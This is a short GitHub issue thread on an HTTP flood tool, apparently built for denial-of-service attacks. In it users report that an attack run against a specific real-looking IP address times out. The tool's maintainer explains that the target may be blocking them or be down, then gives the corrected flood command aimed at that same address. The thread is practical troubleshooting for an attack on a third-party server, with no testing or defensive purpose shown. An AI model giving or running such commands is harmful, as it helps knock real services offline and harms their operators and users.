### ISSUE TITLE
not working

### ISSUE THREAD

**Issue by lilcsz** [Leeon123/golang-httpflood#13]
./httpflood http://145.239.6.33/HIT 80 500 / get 1000 nil

Says: connection timed out

**Comment by ramzx** [comment]
I have the same problem

Leeon123 Boss fix it

**Comment by Leeon123** [comment]
That's mean ur target is blocking you or get take down.

**Comment by Leeon123** [comment]
Wait, the script is using host/ip as a target so why would you use url as the parameter？

**Comment by Leeon123** [comment]
Use it like this 
```
./httpflood 145.239.6.33 80 500 /HIT get 1000 nil
```
